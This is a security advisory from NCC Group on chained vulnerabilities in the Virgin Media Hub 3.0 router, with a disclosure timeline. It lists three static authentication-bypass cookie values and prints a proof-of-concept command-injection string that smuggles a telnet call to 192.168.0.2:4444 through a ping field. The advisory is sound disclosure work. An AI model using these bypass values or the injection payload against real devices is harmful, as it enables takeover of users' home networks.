Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0

Vendor: Virgin Media
Vendor URL: https://www.virginmedia.com/
Versions affected: products before Aug 2018 rollout / 9.1.116V and 9.1.885J
Systems Affected: Hub 3.0
Author: Balazs Bucsay (@xoreipeip)
Advisory URL / CVE Identifier: None
Risk: Critical

Summary

Multiple security vulnerabilities were found in the device’s firmware that could be chained and led to unauthenticated remote command execution.

Location

Multiple parts of the firmware including different services and additional web-related files.

Impact

It was possible to take full control of the device, execute code on multiple operating systems and sniff/ spoof traffic on the internal network and the inbound and outbound Internet communications.

Details

DNS Rebinding

The web server did not check the user-supplied Host: header in HTTP requests, which made it possible to execute a DNS Rebinding attack against the internal web-based management service.

Authentication Bypass Cookies

Three different static cookies were set in the firmware’s web service binary, which made it possible to circumvent the authentication and authorisation procedures and access all functionality of the device with administrator privileges.

Figure 1 – Backdoor cookies

The bypass cookie values were the following:
      • XML_CONFIGURE
      • HNAP_CONFIGURE
      • TACACS_CONFIGURE

Authenticated DOM-Based XSS

One of the JavaScript files used by the management webpage after authentication was vulnerable to DOM-based XSS. It was possible to include a remote JavaScript file from external sources and execute JavaScript code in the victim’s browser.

Vulnerable code snippet:

        base = getURLArgs() || getDefaultPage();
…

         var modbase = base;
…
          $.cachedScript(modbase + “_data.js?ver=9.1.116V”, function success() {
               $.cachedScript(modbase + “.js?ver=9.1.116V”, function success() {
                 try{
…
            }catch(e){
                               handleError(e); // XXXXX MOD. PROD00198245
                }
               });
           });

Backdoor User

The root operating system user was enabled and the same vendor-specific password was set on both architectures, which was the name of the manufacturer.

Remote Command Execution

The ping and traceroute functionality in the management website was vulnerable to command injection. It was possible to execute arbitrary commands on the system as root.

Remote Command Execution on Second Architecture

The secondary architecture was running a service on TCP port 5150 and one its functionality allowed the attacker to execute shell commands on the operating system. This made it possible to take control of the operating system, which was running on the second, Intel x86 core.

A proof of concept value for the vulnerable functionality:

www.google.com$(telnet${IFS}192.168.0.2${IFS}4444/dev/null);4;

Recommendation

Upgrade to the latest firmware – this is done automatically by Virgin Media where the modem is connected to the Internet.

Vendor Communication

17.01.2017 Dedicated NCC Group vulnerability research time spent on the target of assessment 

22.03.2017 Contacted the vendor for the first time

24.03.2017 Details of the vulnerabilities shared with the vendor

08-09.2017 The first roll-out deadline – late August, early September

20.04.2018 Vendor contact, still not fixed or rolled out

31.07.2018 Release rolled-out, most issues fixed

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.